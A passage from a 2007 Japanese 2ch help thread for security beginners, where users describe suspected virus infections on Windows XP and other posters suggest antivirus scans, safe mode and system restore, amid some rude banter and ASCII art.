【症状を解決しようとどのような処置を取ったか】 何もわからねーのにどうすることもできねーだろが
【その他の質問】 なんで重くなったのか知らないのか?(゚д゚)あ?
418 : ◆N9P3SuvBPo :2007/01/21(日) 19:53:08
ポイ捨てする人には答えられません。
以上!
以上!
419 :名無しさん@お腹いっぱい。:2007/01/21(日) 21:18:16
>>417
ひでーなコレ
ひでーなコレ
420 :名無しさん@お腹いっぱい。:2007/01/21(日) 21:19:44
421 :名無しさん@お腹いっぱい。:2007/01/21(日) 21:38:12
店に質問に来る客は半数がそんな態度だよw
422 : ◆N9P3SuvBPo :2007/01/21(日) 21:46:08
>417
良いか?
ここに質問に来る人達は自分らの状況を一生懸命に伝えようと頑張っています。
情報がある程度でも伝われば、我々がなんとか解決に導こうと
色々なアドバイスを与えたりします。
しかし、よほどの重症となっている場合は最終的にリカバリor修理という結果になってしまいますが。
良いか?
ここに質問に来る人達は自分らの状況を一生懸命に伝えようと頑張っています。
情報がある程度でも伝われば、我々がなんとか解決に導こうと
色々なアドバイスを与えたりします。
しかし、よほどの重症となっている場合は最終的にリカバリor修理という結果になってしまいますが。
はいはい捨てればいいんだろ!
。oO
ポイつミ―┛
|||| 。oO
―┛
[ごみ箱]
それで俺様のPCはどうなるんだ?
答えろうじ虫!
。oO
[ごみ箱]
。oO
ポイつミ―┛
|||| 。oO
―┛
[ごみ箱]
それで俺様のPCはどうなるんだ?
答えろうじ虫!
。oO
[ごみ箱]
424 :名無しさん@お腹いっぱい。:2007/01/21(日) 22:13:52
425 :名無しさん@お腹いっぱい。:2007/01/21(日) 22:14:00
以後スルーで
426 : ◆N9P3SuvBPo :2007/01/21(日) 22:15:24
次の質問者どうぞー
427 :名無しさん@お腹いっぱい。:2007/01/21(日) 22:26:52
すいません、15分ほど前にうっかりgoggle.comを開いてしまいました
【使用OS】 ウィンドウズXP home edition
【MicrosoftUpdate】 ここ1、2ヶ月ぐらい?はしてないです
【使用セキュリティソフト】 ノートンインターネットセキュリティ
【セキュリティソフトの定義ファイルは最新の状態であるか】 最新の状態です
【ルータの有無】 ないです
すいません、さっきうっかり他のスレでgoggle.comを開いてしまい、10秒ほどしてそのウィンドウを閉じました(IEで開きました)
ポップアップはノートンにブロックされたので出ませんでした
ウィルス検知の反応も全くありませんでした
変わった症状も今のところありません
ですが、そのスレでは、検知されなくてもたくさんのウイルスやスパイウェアなどが入っていると皆がレスしているし
調べてみたところかなり凶悪なサイトのようで、ビビッています
ノートンは反応しないし、私は何をすればいいのでしょうか?
【使用OS】 ウィンドウズXP home edition
【MicrosoftUpdate】 ここ1、2ヶ月ぐらい?はしてないです
【使用セキュリティソフト】 ノートンインターネットセキュリティ
【セキュリティソフトの定義ファイルは最新の状態であるか】 最新の状態です
【ルータの有無】 ないです
すいません、さっきうっかり他のスレでgoggle.comを開いてしまい、10秒ほどしてそのウィンドウを閉じました(IEで開きました)
ポップアップはノートンにブロックされたので出ませんでした
ウィルス検知の反応も全くありませんでした
変わった症状も今のところありません
ですが、そのスレでは、検知されなくてもたくさんのウイルスやスパイウェアなどが入っていると皆がレスしているし
調べてみたところかなり凶悪なサイトのようで、ビビッています
ノートンは反応しないし、私は何をすればいいのでしょうか?
428 : ◆N9P3SuvBPo :2007/01/21(日) 22:41:59
>427
俺もさっき、そこに行って見たよ。
画面中央にこんな文字が無かった?
>We're sorry!
>This offer is not available in your area.
>You will be redirected shortly.
どうもこのgoggleってサイトにはIframeタグが使われてるようだし…
ノートンがブロックしていたとは言え、MUは1、2ヶ月くらいしてないって言ってるからなー
念の為にカスペルスキーオンラインスキャンでもして、ウイルスが検出
されなければしばらく様子見でいいんじゃないでしょうか。
カスペルスキーオンラインスキャン
ttp://www.kaspersky.co.jp/
俺もさっき、そこに行って見たよ。
画面中央にこんな文字が無かった?
>We're sorry!
>This offer is not available in your area.
>You will be redirected shortly.
どうもこのgoggleってサイトにはIframeタグが使われてるようだし…
ノートンがブロックしていたとは言え、MUは1、2ヶ月くらいしてないって言ってるからなー
念の為にカスペルスキーオンラインスキャンでもして、ウイルスが検出
されなければしばらく様子見でいいんじゃないでしょうか。
カスペルスキーオンラインスキャン
ttp://www.kaspersky.co.jp/
429 :名無しさん@お腹いっぱい。:2007/01/21(日) 22:52:22
>>427
心配ならF8を起動時に押してセーフモードでもう一回フルスキャン
goggle.comは普通に有名だぞ。
後クッキーもついでに削除もしとけ
IE→ツール→インターネットオプション→Cookieの削除
コンパネ→インターネットオプション→Cookieの削除
心配ならF8を起動時に押してセーフモードでもう一回フルスキャン
goggle.comは普通に有名だぞ。
後クッキーもついでに削除もしとけ
IE→ツール→インターネットオプション→Cookieの削除
コンパネ→インターネットオプション→Cookieの削除
430 :名無しさん@お腹いっぱい。:2007/01/21(日) 22:58:31
>>428
いまwindows updateに行ってきたら、一応
「優先度の高い更新プログラム
お使いのコンピュータに該当する優先度の高い更新プログラムは存在しません。
追加で選択できる更新プログラムの有無を確認するには、ホーム ページに戻って [カスタム] をクリックします。」
というふうには表示されました。
そのような文字があったかは覚えてないです;どういう意味なんですか?
カスペルスキースキャンしてみます。ありがとうございます。
>>429
クッキー削除しときました。goggleは今日初めて知りました・・・。
カスペルスキーオンラインスキャンした後で、セーフモードでスキャンしてみます。
セーフモードで立ち上げて、後は普通どおりスキャンすればいいんですよね?
いまwindows updateに行ってきたら、一応
「優先度の高い更新プログラム
お使いのコンピュータに該当する優先度の高い更新プログラムは存在しません。
追加で選択できる更新プログラムの有無を確認するには、ホーム ページに戻って [カスタム] をクリックします。」
というふうには表示されました。
そのような文字があったかは覚えてないです;どういう意味なんですか?
カスペルスキースキャンしてみます。ありがとうございます。
>>429
クッキー削除しときました。goggleは今日初めて知りました・・・。
カスペルスキーオンラインスキャンした後で、セーフモードでスキャンしてみます。
セーフモードで立ち上げて、後は普通どおりスキャンすればいいんですよね?
431 :名無しさん@お腹いっぱい。:2007/01/21(日) 23:01:15
あ、オンラインスキャンするときって、ノートンは切っておいたほうがいいんでしょうか?そのままでもいいですか?
432 : ◆N9P3SuvBPo :2007/01/21(日) 23:01:36
>430
>お使いのコンピュータに該当する優先度の高い更新プログラムは存在しません。
これは重要な更新が全てインストール済みですよって意味。
[カスタム]についてはちと…
>お使いのコンピュータに該当する優先度の高い更新プログラムは存在しません。
これは重要な更新が全てインストール済みですよって意味。
[カスタム]についてはちと…
433 :名無しさん@お腹いっぱい。:2007/01/21(日) 23:05:18
>>432
じゃあ、とりあえずアップデートは最新のものだったってことですね。
じゃあ、とりあえずアップデートは最新のものだったってことですね。
434 :名無しさん@お腹いっぱい。:2007/01/21(日) 23:13:53
435 :名無しさん@お腹いっぱい。:2007/01/21(日) 23:20:24
436 :名無しさん@お腹いっぱい。:2007/01/21(日) 23:25:59
>>432
カスペルスキーのスキャン、スキャン対象を「重要な領域」と「マイコンピュータ」どちらにすればいいんでしょうか?
カスペルスキーのスキャン、スキャン対象を「重要な領域」と「マイコンピュータ」どちらにすればいいんでしょうか?
437 :名無しさん@お腹いっぱい。:2007/01/21(日) 23:29:02
両方やればいいじゃない
マイコンピュータは時間掛かると思うけど
マイコンピュータは時間掛かると思うけど
438 :名無しさん@お腹いっぱい。:2007/01/21(日) 23:29:27
そうします
439 : ◆N9P3SuvBPo :2007/01/21(日) 23:31:52
このgoggleってサイト、もう一度だけIEで行って見たけど、
俺の環境ではトップページのみ開いてお終いでしたね。
アドレスにgoggle.netと入力してページを移動すると
自動的にgoggle.comにリダイレクトされちゃうからな。
IEの設定が運命を分けているのかも
>437
フォローさんくす
俺の環境ではトップページのみ開いてお終いでしたね。
アドレスにgoggle.netと入力してページを移動すると
自動的にgoggle.comにリダイレクトされちゃうからな。
IEの設定が運命を分けているのかも
>437
フォローさんくす
440 :名無しさん@お腹いっぱい。:2007/01/21(日) 23:36:49
>>435
リカバリや修理は最終手段だよ。しなくてもいい例もあるし。しなければならない例だって
ある。人によってはマメにバックアップを取って、
わざと、レジストリ掃除の意味を込めて、リカバリをする人もいるよ。
まぁ・・また何かあったら、来てくださいな!
リカバリや修理は最終手段だよ。しなくてもいい例もあるし。しなければならない例だって
ある。人によってはマメにバックアップを取って、
わざと、レジストリ掃除の意味を込めて、リカバリをする人もいるよ。
まぁ・・また何かあったら、来てくださいな!
441 :名無しさん@お腹いっぱい。:2007/01/21(日) 23:47:59
>>439
ちょっとおっしゃられている意味がわからないのですが、
自分は、goggle.comってアドレスのハイパーリンクから飛びました
まぁとりあえず、カスペルのオンラインスキャンと、セーフモードでのノートンのスキャンをしてみて、しばらく様子をみてみます。
ありがとうございました!
>>440
わかりました。ありがとうございました!
ちょっとおっしゃられている意味がわからないのですが、
自分は、goggle.comってアドレスのハイパーリンクから飛びました
まぁとりあえず、カスペルのオンラインスキャンと、セーフモードでのノートンのスキャンをしてみて、しばらく様子をみてみます。
ありがとうございました!
>>440
わかりました。ありがとうございました!
442 :名無しさん@お腹いっぱい。:2007/01/22(月) 00:44:18
カスペルスキーのオンラインスキャンをしたら、Exploit.HTML.Mhtというウイルスが、Doccuments and Settingsの中のApplication Dataの中の Norton Antivirus の中のQuaran tineというとこの中から検出されたのですが、これはどういうことなんでしょうか・・・
443 :名無しさん@お腹いっぱい。:2007/01/22(月) 00:45:04
ノートンが隔離したファイル
444 :名無しさん@お腹いっぱい。:2007/01/22(月) 00:46:22
あ、じゃあ特に放置でいいってことですか?
445 :名無しさん@お腹いっぱい。:2007/01/22(月) 00:47:31
446 :名無しさん@お腹いっぱい。:2007/01/22(月) 00:48:51
わかりました。ありがとうございます。
とりあえずKNOPPIXで起動したものの
どうすればいいの?
レジスト復旧しようにも、保存したのが見付からない
ノートンか他のやつで保存したはず・・・たぶん
色々したが、なにしたらいいか、もう分かんね・・・・
まあ、色々検索して、回復コンソールで、レジスト回復できるみたいなんだか
起動ディスク作るのに、フロッピー6枚とか、もしくはCDに焼けとか
邪魔くさいよ・・・って言ってる場合じゃないんだけどね
消したレジスト戻したいだけなのに・・・・
で気になったんだが、レジスト回復するとどうなるの?
XPの設定が初期化されるだけ?
インストしてるソフトに影響は有るの?
ウイルスは残ったまま?
エロイ人、教えて
長文スマソ・・・・
どうすればいいの?
レジスト復旧しようにも、保存したのが見付からない
ノートンか他のやつで保存したはず・・・たぶん
色々したが、なにしたらいいか、もう分かんね・・・・
まあ、色々検索して、回復コンソールで、レジスト回復できるみたいなんだか
起動ディスク作るのに、フロッピー6枚とか、もしくはCDに焼けとか
邪魔くさいよ・・・って言ってる場合じゃないんだけどね
消したレジスト戻したいだけなのに・・・・
で気になったんだが、レジスト回復するとどうなるの?
XPの設定が初期化されるだけ?
インストしてるソフトに影響は有るの?
ウイルスは残ったまま?
エロイ人、教えて
長文スマソ・・・・
448 : ◆N9P3SuvBPo :2007/01/22(月) 01:09:34
>447
>起動ディスク作るのに、フロッピー6枚とか
これは確かに邪魔くさい。
レジストリのバックアップ、どこに保存したか覚えてないの?
あと、何て名前で保存したかとか?
>レジスト回復するとどうなるの?
レジストリの設定が元通りになる。
つまりウイルスが書きこんだレジストリ領域も。
でも今は回復させることを考えないと
起動できるようになったら、
もう一度駆除作業をおこなってやればいいんじゃないかな?
>起動ディスク作るのに、フロッピー6枚とか
これは確かに邪魔くさい。
レジストリのバックアップ、どこに保存したか覚えてないの?
あと、何て名前で保存したかとか?
>レジスト回復するとどうなるの?
レジストリの設定が元通りになる。
つまりウイルスが書きこんだレジストリ領域も。
でも今は回復させることを考えないと
起動できるようになったら、
もう一度駆除作業をおこなってやればいいんじゃないかな?
やっとオワタ・・・・
何とか復旧完了した・・・・・・
昨日の状態に・・・・?
ウイルスも消えてない、アンストしてたソフトが有る
どうみても昨日の状態・・・
しかも(c:\windows stup_tmp2,#32)ってエラーが出るし
これは次の起動で直るかもしれんが
今からセーフモードでノートンフルスキャンしてくる
もしかしたらまた、世話になるかも・・・・orz
何とか復旧完了した・・・・・・
昨日の状態に・・・・?
ウイルスも消えてない、アンストしてたソフトが有る
どうみても昨日の状態・・・
しかも(c:\windows stup_tmp2,#32)ってエラーが出るし
これは次の起動で直るかもしれんが
今からセーフモードでノートンフルスキャンしてくる
もしかしたらまた、世話になるかも・・・・orz
450 :名無しさん@お腹いっぱい。:2007/01/22(月) 09:07:46
451 :名無しさん@お腹いっぱい。:2007/01/22(月) 13:40:51
【使用OS】 WindowsXP Home SP1
【MicrosoftUpdate】 最新
【使用セキュリティソフト】 カスペルスキーアンチウィルス5
【セキュリティソフトの定義ファイルは最新の状態であるか】 最新
【ルータの有無】 あり
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 Virus.Win32.Nsag.a ・ system32\WinInet.dll
【どんな症状が出るか】 上下の転送もなく、これといって目立った症状はありません。
【症状が出る前に何をやったか】 1日前にyoutubeでの動画閲覧をした後、次の日に再起動をした。
【症状を解決しようとどのような処置を取ったか】
WinInet.dllを削除したが、エラーが多発したためシステムの復元をし、現在に至ります。
【その他の質問】
ググった結果を元にレジストリを見ても問題はなく、system32フォルダ、単体でウィルススキャンをしても
ウィルスとして発見されませんでしたが、これは問題ないと言う判断をして良いものでしょうか
【MicrosoftUpdate】 最新
【使用セキュリティソフト】 カスペルスキーアンチウィルス5
【セキュリティソフトの定義ファイルは最新の状態であるか】 最新
【ルータの有無】 あり
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 Virus.Win32.Nsag.a ・ system32\WinInet.dll
【どんな症状が出るか】 上下の転送もなく、これといって目立った症状はありません。
【症状が出る前に何をやったか】 1日前にyoutubeでの動画閲覧をした後、次の日に再起動をした。
【症状を解決しようとどのような処置を取ったか】
WinInet.dllを削除したが、エラーが多発したためシステムの復元をし、現在に至ります。
【その他の質問】
ググった結果を元にレジストリを見ても問題はなく、system32フォルダ、単体でウィルススキャンをしても
ウィルスとして発見されませんでしたが、これは問題ないと言う判断をして良いものでしょうか
452 : ◆N9P3SuvBPo :2007/01/22(月) 17:38:31
>451
>【使用OS】 WindowsXP Home SP1
解決後にSP2にすることをお奨めします。
>【スキャンの結果(検出場所)】c:\windows\system32\wininet.dll
このファイルは正規のファイルっすよ。
>これは問題ないと言う判断をして良いものでしょうか
今のところ症状が無いのなら様子見でいいんじゃないでしょうか?
何か症状が出たら執念で解決するとか。
>【使用OS】 WindowsXP Home SP1
解決後にSP2にすることをお奨めします。
>【スキャンの結果(検出場所)】c:\windows\system32\wininet.dll
このファイルは正規のファイルっすよ。
>これは問題ないと言う判断をして良いものでしょうか
今のところ症状が無いのなら様子見でいいんじゃないでしょうか?
何か症状が出たら執念で解決するとか。
もう疲れたので、リカバリしてくるよ・・・・
とりあえず、必要なデーターを外付けに移してる所
終わったら、リカバリするよ
流石に5日もウイルスと格闘してるとね・・・・・
胃も痛くなるし
じゃあまた、ウイルスに引っかかったら、またお世話になるかも・・・・
とりあえず、必要なデーターを外付けに移してる所
終わったら、リカバリするよ
流石に5日もウイルスと格闘してるとね・・・・・
胃も痛くなるし
じゃあまた、ウイルスに引っかかったら、またお世話になるかも・・・・
454 :名無しさん@お腹いっぱい。:2007/01/22(月) 18:58:43
455 :名無しさん@お腹いっぱい。:2007/01/22(月) 23:11:30
456 :名無しさん@お腹いっぱい。:2007/01/22(月) 23:20:39
出た当時の悪いイメージっていつのはなししてんだぁ
457 : ◆N9P3SuvBPo :2007/01/22(月) 23:21:50
>455
ああ、たしかに当初は不具合(ネットに繋げなくなるとか)があったらしいね。
俺はそのとき、XPに興味無かったんで。あ、別にXPに欲情してるわけじゃないぞ。
しかし誤検出は勘弁して欲しいですよね。
ああ、たしかに当初は不具合(ネットに繋げなくなるとか)があったらしいね。
俺はそのとき、XPに興味無かったんで。あ、別にXPに欲情してるわけじゃないぞ。
しかし誤検出は勘弁して欲しいですよね。
458 :名無しさん@お腹いっぱい。:2007/01/22(月) 23:24:08
>455
確かに最悪だったけど、今は絶対SP2にすべき
確かに最悪だったけど、今は絶対SP2にすべき
459 :名無しさん@お腹いっぱい。:2007/01/22(月) 23:30:29
sp3っていつになるんだろ
今年は無理かな
今年は無理かな
460 :名無しさん@お腹いっぱい。:2007/01/23(火) 04:20:42
前にも違うスレで質問しましたが良くわからなかったので
リカバリ前に確認させていただきます。
よろしくお願いいたします。
【使用OS】
windows XP MCE2005
【MicrosoftUpdate】
○行っています。(と思います。止めた覚えはありません)
【使用セキュリティソフト】
○ウイルスセキュリティーゼロ
【セキュリティソフトの定義ファイルは最新の状態であるか】
○最新です。
【ルータの有無】
○有ります。(無線LAN)
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
○Trojan.Win32.KillFiles.ki
【どんな症状が出るか】
○動画ファイルが画像に書き換えられる。
○exeファイルが消去される。
【症状が出る前に何をやったか】
○不明なファイル(スクリーンセイバー)をDL実行しました。
【症状を解決しようとどのような処置を取ったか】
○VSでのウイルススキャン(検知なし)
○カスペルスキーでのオンラインスキャン
【その他の質問】
○対応しないといけない事はありますか?
○個人情報は(ファイルやデータ)は抜かれてるのでしょうか?
○リカバリーで直せますか?
よろしくお願いいたします。
リカバリ前に確認させていただきます。
よろしくお願いいたします。
【使用OS】
windows XP MCE2005
【MicrosoftUpdate】
○行っています。(と思います。止めた覚えはありません)
【使用セキュリティソフト】
○ウイルスセキュリティーゼロ
【セキュリティソフトの定義ファイルは最新の状態であるか】
○最新です。
【ルータの有無】
○有ります。(無線LAN)
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
○Trojan.Win32.KillFiles.ki
【どんな症状が出るか】
○動画ファイルが画像に書き換えられる。
○exeファイルが消去される。
【症状が出る前に何をやったか】
○不明なファイル(スクリーンセイバー)をDL実行しました。
【症状を解決しようとどのような処置を取ったか】
○VSでのウイルススキャン(検知なし)
○カスペルスキーでのオンラインスキャン
【その他の質問】
○対応しないといけない事はありますか?
○個人情報は(ファイルやデータ)は抜かれてるのでしょうか?
○リカバリーで直せますか?
よろしくお願いいたします。
461 :名無しさん@お腹いっぱい。:2007/01/23(火) 08:05:11
■有害なマルウェア警報■
1月23日時点では検出できるセキュリティソフトが少ない悪質Rootkitが出現しました。
現時点では検出不能の”NOD32”のような製品をお使いのユーザーは、特に注意して下さい。
・マイクロソフトWindows Defender検出名:VirTool:WinNT/FURootkit.F
・BitDefender検出名:Trojan.Rootkit.Agent.AE
・kaspersky検出名:Rootkit.Win32.Agent.ab
(ソース:検出可能なセキュリティソフト一覧)
http://www.virustotal.com/vt/en/resultadox?8b0a57dcc040a10869f6791de1f7ad2b
462 :名無しさん@お腹いっぱい。:2007/01/23(火) 12:30:52
463 :名無しさん@お腹いっぱい。:2007/01/23(火) 15:28:26
464 :名無しさん@お腹いっぱい。:2007/01/23(火) 15:53:34
AVGがだめでもBitDefenderがあるからなんとかなるかな。
465 :名無しさん@お腹いっぱい。:2007/01/23(火) 16:01:24
466 :名無しさん@お腹いっぱい。:2007/01/23(火) 16:21:26
467 :名無しさん@お腹いっぱい。:2007/01/23(火) 16:22:16
セキュリティ初心者質問スレッドpart80
http://pc10.2ch.net/test/read.cgi/sec/1167252179/
974 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2007/01/23(火) 16:03:15
>>973
なんでリンク先死んでるの?
http://pc10.2ch.net/test/read.cgi/sec/1167252179/
974 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2007/01/23(火) 16:03:15
>>973
なんでリンク先死んでるの?
468 :名無しさん@お腹いっぱい。:2007/01/23(火) 16:27:33
>>466
NOD厨が血相変えて突っ込みを入れているっぽい(w
NOD32アンチウィルス Part41
357 :名無しさん@お腹いっぱい。:2007/01/23(火) 16:05:01
>>355
なんでリンク先死んでるの?
一番いいセキュリティソフトはなんだ!!Part21
238 :名無しさん@お腹いっぱい。:2007/01/23(火) 16:00:50
>>236
なんでリンク先死んでるの?
NOD厨が血相変えて突っ込みを入れているっぽい(w
NOD32アンチウィルス Part41
357 :名無しさん@お腹いっぱい。:2007/01/23(火) 16:05:01
>>355
なんでリンク先死んでるの?
一番いいセキュリティソフトはなんだ!!Part21
238 :名無しさん@お腹いっぱい。:2007/01/23(火) 16:00:50
>>236
なんでリンク先死んでるの?
469 :名無しさん@お腹いっぱい。:2007/01/23(火) 16:49:22
>>466-468
いやNOD厨じゃないが・・・
いやNOD厨じゃないが・・・
470 :名無しさん@お腹いっぱい。:2007/01/23(火) 17:13:19
ゝ /' '\ :::::::::::'
. -・=-, 、-・=- ::::::::::;'
| .,ノ(・ ・ ( ⌒ ::6) <いやNOD厨じゃないが・・・♪
.l ┃トョヨコイ┃ .ソ
ヽ┃`ニ'´ ┃ ,.i-、
. -・=-, 、-・=- ::::::::::;'
| .,ノ(・ ・ ( ⌒ ::6) <いやNOD厨じゃないが・・・♪
.l ┃トョヨコイ┃ .ソ
ヽ┃`ニ'´ ┃ ,.i-、
471 :名無しさん@お腹いっぱい。:2007/01/23(火) 17:18:02
ワラタ
472 :名無しさん@お腹いっぱい。:2007/01/23(火) 23:27:45
ノートン使ってて、いきなりアウトブレーク警告っ表示が出たんですけど
これってどういう意味なんですか?
別に自分のPCからウイルスが見つかったってわけではないんですか?
これってどういう意味なんですか?
別に自分のPCからウイルスが見つかったってわけではないんですか?
473 :名無しさん@お腹いっぱい。:2007/01/24(水) 00:38:46
>>472
正規ユーザなら説明書に書いてあるだろ
正規ユーザなら説明書に書いてあるだろ
474 :名無しさん@お腹いっぱい。:2007/01/24(水) 01:14:42
なんかウェブサイトがとつぜん
YouTubeと描かれた小さい画像で埋まることがある
ウィルスですかこれ?
YouTubeと描かれた小さい画像で埋まることがある
ウィルスですかこれ?
475 :名無しさん@お腹いっぱい。:2007/01/24(水) 16:12:10
なんだったの?
このマルチ>>461
このマルチ>>461
476 :名無しさん@お腹いっぱい。:2007/01/24(水) 16:29:23
477 :名無しさん@お腹いっぱい。:2007/01/24(水) 16:35:08
478 :名無しさん@お腹いっぱい。:2007/01/24(水) 20:21:29
たまに電源から異音がなるんですが、
これはウィルスなんでしょうか?
OS:windows2000
これはウィルスなんでしょうか?
OS:windows2000
479 :名無しさん@お腹いっぱい。:2007/01/24(水) 20:31:06
>478
電源がへたってるのかな
掃除してみたら
電源がへたってるのかな
掃除してみたら
480 :名無しさん@お腹いっぱい。:2007/01/24(水) 20:36:16
481 :名無しさん@お腹いっぱい。:2007/01/24(水) 20:37:56
電源切ってから5分後勝手に立ち上がってきたんですがウイルスでしょか?ちなみにxpです
電源は変えたばかりです・・・。
一応NOD32でウィルススキャンしたんですが、
ウィルスにやられままなんじゃないかとすごい不安です。
一応NOD32でウィルススキャンしたんですが、
ウィルスにやられままなんじゃないかとすごい不安です。
483 :名無しさん@お腹いっぱい。:2007/01/24(水) 20:45:12
484 :名無しさん@お腹いっぱい。:2007/01/24(水) 20:48:37
>482
それなら電源が不良品だったんじゃないの
それなら電源が不良品だったんじゃないの
485 : ◆N9P3SuvBPo :2007/01/24(水) 20:54:51
>482
異音の原因を執念で突き止めろ
異音の原因を執念で突き止めろ
487 :名無しさん@お腹いっぱい。:2007/01/24(水) 22:07:41
IEキャッシュフォルダのアクセスを拒否しとけばセキュ穴つかれて.exe自動実行されるサイト対策になると思うんだけど どう?
488 :名無しさん@お腹いっぱい。:2007/01/24(水) 23:33:37
∩_
〈〈〈 ヽ
〈⊃ }
∩___∩ | |
| ノ ヽ ! !
/ ● ● | /
| ( _●_) ミ/ こいつ最高にアホ
彡、 |∪| /
/ __ ヽノ /
(___) /
〈〈〈 ヽ
〈⊃ }
∩___∩ | |
| ノ ヽ ! !
/ ● ● | /
| ( _●_) ミ/ こいつ最高にアホ
彡、 |∪| /
/ __ ヽノ /
(___) /
489 :名無しさん@お腹いっぱい。:2007/01/25(木) 02:06:20
>>486
だれだよ
だれだよ
490 :名無しさん@お腹いっぱい。:2007/01/25(木) 08:19:14
>>461
>>463
また"NOD32"などで、まだ検出できないウイルスが出現した('A`)
ちゃんと検出できている製品もあるのに。
代表的な検出名:PoisonIvy.j(バックドアの一種)
http://vista.o0o0.jp/img/vi6966723460.jpg
http://www.virustotal.com/
>>463
また"NOD32"などで、まだ検出できないウイルスが出現した('A`)
ちゃんと検出できている製品もあるのに。
代表的な検出名:PoisonIvy.j(バックドアの一種)
http://vista.o0o0.jp/img/vi6966723460.jpg
http://www.virustotal.com/
491 :名無しさん@お腹いっぱい。:2007/01/25(木) 11:34:17
PC起動したらデスクトップ画面で背景だけ表示されて、アイコンやタスクバーが表示されません…。
ウイルスでしょうか?
ウイルスでしょうか?
492 :名無しさん@お腹いっぱい。:2007/01/25(木) 11:39:37
>>491
前回の起動時にやったこととか現状になる原因の思い当たる節とかも書かないと解決の指針が立たない
前回の起動時にやったこととか現状になる原因の思い当たる節とかも書かないと解決の指針が立たない
493 :名無しさん@お腹いっぱい。:2007/01/25(木) 11:46:05
【使用OS】 「」
【MicrosoftUpdateの状態】 「」
【使用セキュリティソフトとバージョン】 「」
【セキュリティソフトの定義ファイルは最新の状態であるか】 「」
【スパイウェア対策ソフト】 「」
【ルータの有無】 「」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 「」
【どんな症状が出るか】 「」
【症状が出る前に何をやったか】 「」
【症状を解決しようとどのような処置を取ったか】 「」
【その他の質問】 「」
【MicrosoftUpdateの状態】 「」
【使用セキュリティソフトとバージョン】 「」
【セキュリティソフトの定義ファイルは最新の状態であるか】 「」
【スパイウェア対策ソフト】 「」
【ルータの有無】 「」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 「」
【どんな症状が出るか】 「」
【症状が出る前に何をやったか】 「」
【症状を解決しようとどのような処置を取ったか】 「」
【その他の質問】 「」
494 :名無しさん@お腹いっぱい。:2007/01/25(木) 11:55:24
495 :名無しさん@お腹いっぱい。:2007/01/25(木) 19:06:56
496 : ◆N9P3SuvBPo :2007/01/25(木) 20:26:33
>494-495
いまだに音沙汰無しということは、リカバリでもしてるんだろうか?
>491
セーフモードとコマンドプロンプトで起動
%systemroot%\system32\restore\rstrui.exe
システムの復元で戻す
いまだに音沙汰無しということは、リカバリでもしてるんだろうか?
>491
セーフモードとコマンドプロンプトで起動
%systemroot%\system32\restore\rstrui.exe
システムの復元で戻す
497 :491:2007/01/26(金) 00:47:30
>>494-496
返信ありがとうございます。
>>494さんの言うとおりセーフモードで起動しましたがインターネットが開けなかったり、ウイルスセキュリティソフトのウイルス自動検知なとがOFFになっていますが、やはりこれはウイルスの仕業でしょうか?
前回の正常起動時にP2Pソフトを使用したのが原因だと思います。
明日、>>495さん、>>496さんのやり方をやってみようと思います。
携帯から長々とすいませんでしたm(_ _)m
返信ありがとうございます。
>>494さんの言うとおりセーフモードで起動しましたがインターネットが開けなかったり、ウイルスセキュリティソフトのウイルス自動検知なとがOFFになっていますが、やはりこれはウイルスの仕業でしょうか?
前回の正常起動時にP2Pソフトを使用したのが原因だと思います。
明日、>>495さん、>>496さんのやり方をやってみようと思います。
携帯から長々とすいませんでしたm(_ _)m
498 :名無しさん@お腹いっぱい。:2007/01/26(金) 01:02:12
いきなり画面の背景がエメラルド色になってしまいました。マウスの矢印もです。
突然元の白に戻る事もあるのですが今までなかったのに何でか分かる方いませんか??
例えば2Cなどを見てその影響でなったりしますか?
突然元の白に戻る事もあるのですが今までなかったのに何でか分かる方いませんか??
例えば2Cなどを見てその影響でなったりしますか?
499 :名無しさん@お腹いっぱい。:2007/01/26(金) 01:24:58
いまC:\WINDOWS\system32\acs.exeが韓国に繋ごうとしたのでjeticoで不許可にしたのですがウイルスでしょうか?
ウイルストータルで検索しても異常なし、プロパティに会社名も何も無い、富士通のPCではありません。
ウイルストータルで検索しても異常なし、プロパティに会社名も何も無い、富士通のPCではありません。
500 :名無しさん@お腹いっぱい。:2007/01/26(金) 09:47:00
501 :名無しさん@お腹いっぱい。:2007/01/26(金) 10:39:21
>>498
モニターの寿命では?
モニターの寿命では?
502 :名無しさん@お腹いっぱい。:2007/01/26(金) 20:02:09
↑4年くらい前に買った富士通のノートPCであまり使ってなく、
最近は週に1回使うか使わないかなんですが寿命なんですか?
ウィルスではないですか?どうすれば直りますかね
最近は週に1回使うか使わないかなんですが寿命なんですか?
ウィルスではないですか?どうすれば直りますかね
503 :名無しさん@お腹いっぱい。:2007/01/26(金) 20:09:34
ノートPCではよくある事
外部モニタに繋げば分かる
外部モニタに繋げば分かる
hi
505 :名無しさん@お腹いっぱい。:2007/01/26(金) 20:54:09
korean?
506 :名無しさん@お腹いっぱい。:2007/01/26(金) 23:29:17
〉〉503 ウィルスではないのでよね?修理出すか買い替えないといけないのですか?近所なども関係ないですよね
507 :名無しさん@お腹いっぱい。:2007/01/27(土) 16:32:21
ウイルスチャイサーで全てのドライブにウイルスの手動検査を行いました。
検査が終わりウイルスは検出されませんでしたってメッセージがでるんですけど。
他のところに下のような表示がでます。
ファイル名 ウイルス名 状態
C:\quarantine\101-200[1].VirVBS/LoveLetter@MM移動 (駆除失敗)
C:\quarantine\1155374931[1].Vir VBS/LoveLetter@MM移動 (駆除失敗)
C:\quarantine\1155374931[1].Vir.0 VBS/LoveLetter@MM移動 (駆除失敗)
どうすればよいでしょうか?
検査が終わりウイルスは検出されませんでしたってメッセージがでるんですけど。
他のところに下のような表示がでます。
ファイル名 ウイルス名 状態
C:\quarantine\101-200[1].VirVBS/LoveLetter@MM移動 (駆除失敗)
C:\quarantine\1155374931[1].Vir VBS/LoveLetter@MM移動 (駆除失敗)
C:\quarantine\1155374931[1].Vir.0 VBS/LoveLetter@MM移動 (駆除失敗)
どうすればよいでしょうか?
508 :名無しさん@お腹いっぱい。:2007/01/27(土) 17:14:53
>>507
つquarantine
つquarantine
509 :名無しさん@お腹いっぱい。:2007/01/27(土) 18:07:38
>>508どういうことなんでしょうか??
510 :名無しさん@お腹いっぱい。:2007/01/27(土) 18:10:13
辞書でひけよ
